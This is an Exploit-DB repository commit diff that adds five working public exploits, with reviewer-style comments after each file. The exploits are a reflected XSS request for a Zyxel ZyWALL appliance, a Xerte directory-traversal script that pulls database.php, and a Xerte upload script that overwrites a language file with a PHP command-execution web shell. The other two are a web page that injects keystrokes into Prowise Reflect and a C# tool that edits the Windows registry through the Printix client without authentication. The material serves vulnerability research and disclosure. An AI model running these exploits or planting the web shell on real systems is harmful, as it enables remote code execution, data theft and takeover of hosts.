DB: 2022-03-03

5 changes to exploits/shellcodes

Prowise Reflect v1.0.9 - Remote Keystroke Injection
Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
Xerte 3.10.3 - Directory Traversal (Authenticated)
Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
Offensive Security 2022-03-03 05:01:37 +00:00
parent bba496461e
commit 00bdb64074
6 changed files with 764 additions and 0 deletions


@ -0,0 +1,17 @@
# Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)
# Date: 1/3/2022
# Exploit Author: Momen Eldawakhly (CyberGuy)
# Vendor Homepage: https://www.zyxel.com
# Version: ZyWALL 2 Plus
# Tested on: Ubuntu Linux [Firefox]
# CVE : CVE-2021-46387
GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1
Host: vuln.ip:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
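Review bot: The `# Version: ZyWALL 2 Plus` header names only the model, with no firmware release, so a reader cannot tell which builds the report covers or whether a fixed one exists; the affected firmware version should be added next to it. The file also never says what is wrong: judging by the request line, the `id` query parameter of `/Forms/rpAuth_1` is presumably echoed into the login form without HTML encoding, and a one-line comment such as `# The id parameter is reflected into the page without output encoding (reflected XSS).` would make that explicit. The `# Date: 1/3/2022` format is ambiguous between day-first and month-first.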

58
exploits/php/webapps/50794.py Executable file

@ -0,0 +1,58 @@
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https://<host>/getfile.php?file=<user-direcotry>/../../database.php
# You can find a userfiles-directory by creating a project and browsing the media menu.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers>-<username>-<templatename>
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
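Review bot: Both `re.findall` patterns are written as ordinary strings, so `\d` and `\/` are invalid string escapes that newer Python versions warn about; they should be raw strings, e.g. `re.findall(r'(\d+)', template_id.text)`, and `/` needs no backslash in a regex. Each result is also indexed with `[0]` unchecked, so against a host where guest login is off or the issue is fixed the script stops with an `IndexError` instead of reporting that the check did not succeed. The header should say that every run leaves a project named `exploit` on the target, and that the request to look for in access logs is `getfile.php` with `../` in the `file` parameter. Indentation under the `with` block is not visible on this page, so the layout of the file could not be reviewed.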

185
exploits/php/webapps/50795.py Executable file

@ -0,0 +1,185 @@
# Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip
# Version: up until version 3.9
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44664
# This PoC assumes guest login is enabled and the en-GB langues files are used.
# This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell.
# Vulnerable url: https://<host>/website_code/php/import/fileupload.php
# The mediapath variable can be used to set the destination of the uploaded.
# Create new project from template -> visit "Properties" (! symbol) -> Media and Quota
import requests
import re
xerte_base_url = "http://127.0.0.1"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to find the install path
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the install path:
install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0]
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978',
}
# index.inc file
data = \
'''-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc"
Content-Type: application/octet-stream
<?php
if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }
/**
*
* index.php english language file
*
* @author Patrick Lockley
* @version 1.0
* @copyright Pat Lockley
* @package
*/
define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password");
define("INDEX_USERNAME_EMPTY", "Please enter your username");
define("INDEX_PASSWORD_EMPTY", "Please enter your password");
define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page");
define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct");
define("INDEX_LOGIN", "login area");
define("INDEX_USERNAME", "Username");
define("INDEX_PASSWORD", "Password");
define("INDEX_HELP_TITLE", "Getting Started");
define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website.");
define("INDEX_HELP_INTRO_LINK_TEXT","Show me!");
define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available");
define("INDEX_FOLDER_PROMPT","What would you like to call your folder?");
define("INDEX_WORKSPACE_TITLE","My Projects");
define("INDEX_CREATE","Project Templates");
define("INDEX_DETAILS","Project Details");
define("INDEX_SORT","Sort");
define("INDEX_SEARCH","Search");
define("INDEX_SORT_A","Alphabetical A-Z");
define("INDEX_SORT_Z","Alphabetical Z-A");
define("INDEX_SORT_NEW","Age (New to Old)");
define("INDEX_SORT_OLD","Age (Old to New)");
define("INDEX_LOG_OUT","Log out");
define("INDEX_LOGGED_IN_AS","Logged in as");
define("INDEX_BUTTON_LOGIN","Login");
define("INDEX_BUTTON_LOGOUT","Logout");
define("INDEX_BUTTON_PROPERTIES","Properties");
define("INDEX_BUTTON_EDIT","Edit");
define("INDEX_BUTTON_PREVIEW", "Preview");
define("INDEX_BUTTON_SORT", "Sort");
define("INDEX_BUTTON_NEWFOLDER", "New Folder");
define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create");
define("INDEX_BUTTON_DELETE", "Delete");
define("INDEX_BUTTON_DUPLICATE", "Duplicate");
define("INDEX_BUTTON_PUBLISH", "Publish");
define("INDEX_BUTTON_CANCEL", "Cancel");
define("INDEX_BUTTON_SAVE", "Save");
define("INDEX_XAPI_DASHBOARD_FROM", "From:");
define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:");
define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:");
define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups");
define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses");
define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard");
define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options");
define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns");
define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview");
define("INDEX_XAPI_DASHBOARD_PRINT", "Print");
\r
\r
-----------------------------170331411929658976061651588978
Content-Disposition: form-data; name="mediapath"
''' \
+ install_path \
+ '''../../../languages/en-GB/
-----------------------------170331411929658976061651588978--\r
'''
# Overwrite index.inc file
response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data)
print('Installation path: ' + install_path)
print(response.text)
if "success" in response.text:
print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
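Review bot: The header comment mentions that the en-GB language file is overwritten but not that the change is permanent: the script keeps no copy of the original `index.inc` and leaves a `cmd` request handler in a file that, per that comment, the index page loads, so it presumably stays reachable until the file is restored. A line such as `# NOTE: replaces languages/en-GB/index.inc on the target; restore the original file after testing.` belongs next to that comment. For detection the header could also name the artefacts visible here: a POST to `/website_code/php/import/fileupload.php` whose `mediapath` field contains `../`, and a modified `languages/en-GB/index.inc`. The `'(\d+)'` pattern has the same non-raw-string escape as in 50794.py.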


@ -0,0 +1,86 @@
# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection
# Date: 30/10/2022
# Exploit Author: Rik Lutz
# Vendor Homepage: https://www.prowise.com/
# Version: V1.0.9
# Tested on: Windows 10
# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.
# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),
# or by visiting a malicious website. This POC contains the malicious webpage.
# Steps:
# 1. Start Prowise reflect
# 2. Try to connect to a reflect server e.q. ygm7u6od
# 3. When it is connecting click exploit
# - Start menu will open, types notepad.exe and types hello world.
<!DOCTYPE HTML>
<html>
<head>
<script type = "text/javascript">
function wait(ms){
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
}
function WebSocketTest() {
var StateConnecting = new Boolean(false);
if ("WebSocket" in window) {
// Let us open a web socket
var ws = new WebSocket("ws://localhost:8082");
ws.onopen = function() {
ws.send('{"event":"keyboard", "key":"super"}');
wait(400);
//character is slower
// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};
// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true
var exploitcode = "notepad.exe"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(300);
ws.send('{"event":"keyboard", "key":"enter"}');
wait(2000);
exploitcode = "Hello world!"
for (let i = 0; i < exploitcode.length; i++) {
ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');
}
wait(200);
};
ws.onmessage = function (evt) {
var received_msg = evt.data;
};
ws.onclose = function() {
// websocket is closed.
alert("Connection is closed...");
};
} else {
// The browser doesn't support WebSocket
alert("WebSocket NOT supported by your Browser!");
}
}
</script>
</head>
<body>
<div id = "sse">
<a href = "javascript:WebSocketTest()">Exploit!</a>
</div>
</body>
</html>
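Review bot: The `# Date: 30/10/2022` header is later than the commit date shown on this page (2022-03-03), so it is presumably a typo and should be confirmed with the author. The header also never states the root cause a defender needs: judging by the PoC, the listener on port 8082 accepts `keyboard` events without authenticating the sender or checking the WebSocket `Origin`, and a line such as `# Root cause: the local WebSocket service on port 8082 accepts input events from any origin without authentication.` would say so. In the script, `StateConnecting` is assigned but never used, and `wait()` is a busy loop that blocks the page while it spins.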


@ -0,0 +1,413 @@
# Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE)
# Date: 3/1/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25089
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089
using Microsoft.Win32;
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
/**
* ________________________________________
*
* Printix Vulnerability, CVE-2022-25089
* Part of a Printix Vulnerability series
* Author: Logan Latvala
* Github: https://github.com/ComparedArray/printix-CVE-2022-25089
* ________________________________________
*
*/
namespace ConsoleApp1a
{
public class PersistentRegistryData
{
public PersistentRegistryCmds cmd;
public string path;
public int VDIType;
public byte[] registryData;
}
[JsonConverter(typeof(StringEnumConverter))]
public enum PersistentRegistryCmds
{
StoreData = 1,
DeleteSubTree,
RestoreData
}
public class Session
{
public int commandNumber { get; set; }
public string host { get; set; }
public string data { get; set; }
public string sessionName { get; set; }
public Session(int commandSessionNumber = 0)
{
commandNumber = commandSessionNumber;
switch (commandSessionNumber)
{
//Incase it's initiated, kill it immediately.
case (0):
Environment.Exit(0x001);
break;
//Incase the Ping request is sent though, get its needed data.
case (2):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
data = "pingData";
sessionName = "PingerRinger";
break;
//Incase the RegEdit request is sent though, get its needed data.
case (49):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
PersistentRegistryData persistentRegistryData = new PersistentRegistryData();
persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData;
persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType;
//persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName";
Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n");
Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n");
Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE");
Console.Write("Registry Node: ");
persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix");
Console.WriteLine("Full Address Set To: " + persistentRegistryData.path);
//persistentRegistryData.registryData = new byte[2];
//byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String);
Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n");
Console.Write("Type: ");
int dataF = int.Parse(Console.ReadLine());
Console.WriteLine("Set Data to: " + dataF);
Console.WriteLine("\n What value is your type? \n");
Console.Write("Value: ");
string dataB = Console.ReadLine();
Console.WriteLine("Set Data to: " + dataF);
byte[] loader = null;
List<byte> byteContainer = new List<byte>();
//Dword = 4
//SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!)
switch (dataF)
{
case (1):
loader = selectDataType(dataB, RegistryValueKind.String);
byteContainer.Add(1);
break;
case (2):
loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord);
byteContainer.Add(4);
break;
case (3):
loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord);
byteContainer.Add(11);
break;
case (4):
loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString);
byteContainer.Add(7);
break;
}
int pathHolder = 0;
foreach (byte bit in loader)
{
pathHolder++;
byteContainer.Add(bit);
}
persistentRegistryData.registryData = byteContainer.ToArray();
//added stuff:
//PersistentRegistryData data = new PersistentRegistryData();
//data.cmd = PersistentRegistryCmds.RestoreData;
//data.path = "";
//data.cmd
Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData));
data = JsonConvert.SerializeObject(persistentRegistryData);
break;
//Custom cases, such as custom JSON Inputs and more.
case (100):
Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
Console.Write("IP: ");
host = Console.ReadLine();
Console.WriteLine("Host address set to: " + host);
Console.WriteLine("\n What Data Should Be Sent?\n");
Console.Write("Data: ");
data = Console.ReadLine();
Console.WriteLine("Data set to: " + data);
Console.WriteLine("\n What Session Name Should Be Used? \n");
Console.Write("Session Name: ");
sessionName = Console.ReadLine();
Console.WriteLine("Session name set to: " + sessionName);
break;
}
}
public static byte[] selectDataType(object value, RegistryValueKind format)
{
byte[] array = new byte[50];
switch (format)
{
case RegistryValueKind.String: //1
array = Encoding.UTF8.GetBytes((string)value);
break;
case RegistryValueKind.DWord://4
array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
break;
case RegistryValueKind.QWord://11
if (value == null)
{
value = 0L;
}
array = BitConverter.GetBytes((long)value);
break;
case RegistryValueKind.MultiString://7
{
if (value == null)
{
value = new string[1] { string.Empty };
}
string[] array2 = (string[])value;
foreach (string s in array2)
{
byte[] bytes = Encoding.UTF8.GetBytes(s);
byte[] second = new byte[1] { (byte)bytes.Length };
array = array.Concat(second).Concat(bytes).ToArray();
}
break;
}
}
return array;
}
}
class CVESUBMISSION
{
static void Main(string[] args)
{
FORCERESTART:
try
{
//Edit any registry without auth:
//Use command 49, use the code provided on the desktop...
//This modifies it directly, so no specific username is needed. :D
//The command parameter, a list of commands is below.
int command = 43;
//To force the user to input variables or not.
bool forceCustomInput = false;
//The data to send, this isn't flexible and should be used only for specific examples.
//Try to keep above 4 characters if you're just shoving things into the command.
string data = "{\"profileID\":1,\"result\":true}";
//The username to use.
//This is to fulfill the requriements whilst in development mode.
DefaultValues.CurrentSessName = "printixMDNs7914";
//The host to connect to. DEFAULT= "localhost"
string host = "192.168.1.29";
// Configuration Above
InvalidInputLabel:
Console.Clear();
Console.WriteLine("Please select the certificate you want to use with port 21338.");
//Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
Console.WriteLine("Already selected, client authentication isn't needed.");
Console.WriteLine(" /───────────────────────────\\ ");
Console.WriteLine("\nWhat would you like to do?");
Console.WriteLine("\n 1. Send Ping Request");
Console.WriteLine(" 2. Send Registry Edit Request");
Console.WriteLine(" 3. Send Custom Request");
Console.WriteLine(" 4. Experimental Mode (Beta)\n");
Console.Write("I choose option # ");
try
{
switch (int.Parse(Console.ReadLine().ToLower()))
{
case (1):
Session session = new Session(2);
command = session.commandNumber;
host = session.host;
data = session.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (2):
Session sessionTwo = new Session(49);
command = sessionTwo.commandNumber;
host = sessionTwo.host;
data = sessionTwo.data;
DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
break;
case (3):
Console.WriteLine("What command number do you want to input?");
command = int.Parse(Console.ReadLine().ToString());
Console.WriteLine("What IP would you like to use? (Default = localhost)");
host = Console.ReadLine();
Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
data = Console.ReadLine();
Console.WriteLine("What session name do you want to use? ");
DefaultValues.CurrentSessName = Console.ReadLine();
break;
case (4):
Console.WriteLine("Not yet implemented.");
break;
}
}
catch (Exception e)
{
Console.WriteLine("Invalid Input!");
goto InvalidInputLabel;
}
Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");
CompCommClient client = new CompCommClient();
byte[] responseStorage = new byte[25555];
int responseCMD = 0;
client.Connect(host, 21338, 3, 10000);
client.SendMessage(command, Encoding.UTF8.GetBytes(data));
// Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
// Check for output multiple times, and see if this is conclusive.
//client.SendMessage(51, Encoding.ASCII.GetBytes(data));
new Thread(() => {
//Thread.Sleep(4000);
if (client.Connected())
{
int cam = 0;
// 4 itterations of loops, may be lifted in the future.
while (cam < 5)
{
//Reads the datastream and keeps returning results.
//Thread.Sleep(100);
try
{
try
{
if (responseStorage?.Any() == true)
{
//List<byte> byo1 = responseStorage.ToList();
if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
{
foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
{
if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
{
Console.Write(cam2);
}
}
}else
{
}
}
}
catch (Exception e) { Debug.WriteLine(e); }
client.Read(out responseCMD, out responseStorage);
}
catch (Exception e)
{
goto ReadException;
}
Thread.Sleep(100);
cam++;
//Console.WriteLine(cam);
}
}
else
{
Console.WriteLine("[WARNING]: Client is Disconnected!");
}
ReadException:
try
{
Console.WriteLine("Command Variable Response: " + responseCMD);
Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
client.disConnect();
}
catch (Exception e)
{
Console.WriteLine("After 4.2 Seconds, there has been no response!");
client.disConnect();
}
}).Start();
Console.WriteLine(responseCMD);
Console.ReadLine();
}
catch (Exception e)
{
Console.WriteLine(e);
Console.ReadLine();
//Environment.Exit(e.HResult);
}
goto FORCERESTART;
}
}
}
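Review bot: `CompCommClient` and `DefaultValues` are used in `Main` but are not defined anywhere in this file, so it does not build on its own; the header should say where they come from (presumably the linked GitHub project). In `Session`, the second `Console.WriteLine("Set Data to: " + dataF);` echoes the type number again where the value `dataB` was evidently meant, and the comment `// 4 itterations of loops` sits above `while (cam < 5)`. For defenders the header omits the exposure the code implies: the client is contacted on TCP port 21338 and, according to the in-code comment, command 49 changes values under HKEY_LOCAL_MACHINE without authentication, so a note recommending that inbound access to that port be restricted on hosts running version 1.3.1106.0 or earlier would be useful.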


@ -18630,6 +18630,8 @@ id,file,description,date,author,type,platform,port
50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows, 50781,exploits/windows/remote/50781.txt,"Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)",1970-01-01,"Amel BOUZIANE-LEBLOND",remote,windows,
50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware, 50783,exploits/hardware/remote/50783.py,"ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD",1970-01-01,LiquidWorm,remote,hardware,
50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware, 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44863,3 +44865,6 @@ id,file,description,date,author,type,platform,port
50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php, 50786,exploits/php/webapps/50786.rb,"Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)",1970-01-01,"Talha Karakumru",webapps,php,
50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux, 50788,exploits/linux/webapps/50788.txt,"Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,Ghuliev,webapps,linux,
50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,multiple,
50794,exploits/php/webapps/50794.py,"Xerte 3.10.3 - Directory Traversal (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
50795,exploits/php/webapps/50795.py,"Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Rik Lutz",webapps,php,
50797,exploits/multiple/webapps/50797.txt,"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,multiple,

Can't render this file because it is too large.